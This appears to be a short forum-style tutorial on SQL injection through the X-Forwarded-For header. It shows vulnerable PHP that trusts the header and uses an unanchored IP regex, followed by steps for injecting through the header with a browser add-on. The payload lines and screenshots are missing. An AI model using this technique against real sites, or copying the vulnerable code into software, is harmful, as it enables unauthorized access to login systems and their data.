Requirements :
 
Site that use X-forwarded-for
Basic knowledge with SQLi (string based)
Live HTTP headers
 
 
Introduction :
 
X-forwarded-for is often use to get the ip of user even though he uses a proxy.
Example and explanation :
 
 
PHP Code:
function getip()
{
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
       $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
    else
    {
      $ip = $_SERVER["REMOTE_ADDR"];
        }
 
This code create an ip variable with the real ip.
 
 
PHP Code:
    if (preg_match("#^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#",$ip))
    {
        return $ip;
    }
    else
    {
        return $_SERVER["REMOTE_ADDR"];
    }
}
 
This code check if it's real ip but this code is vulnerable, why ?
 
Because a regex has a beginning and a end. The beginning delimiter is ^ and the ending delimiter is $, note that the $ is missing. So the regex check only the beginning of the ip. If your ip is 127.0.0.1 the regex will send back true but if your ip is 127.0.01+whateveryouwant the regex will send back true too.
 
PHP code that is vulnerable :
 
 
PHP Code:
$req = mysql_query("SELECT username,password FROM admin WHERE username='".sql($_POST['username'])."' AND password='".md5($_POST['password'])."' AND ip='".getip()."'");
 
Exploitation :



First open Live HTTP headers then actualize the page :



Note that the injection will be a string based.

Now click on the url then click on replay and add :




Then add a quote after your ip address and a nice error like that will be displayed :



And now do your injection like string based, the most important thing is that you have to understand that the injection point is your ip in X-forwarded.

Hope you learn something new

作者 http://hi.baidu.com/evilrapper/blog/item/518068a2b7b3148ccbefd0c5.html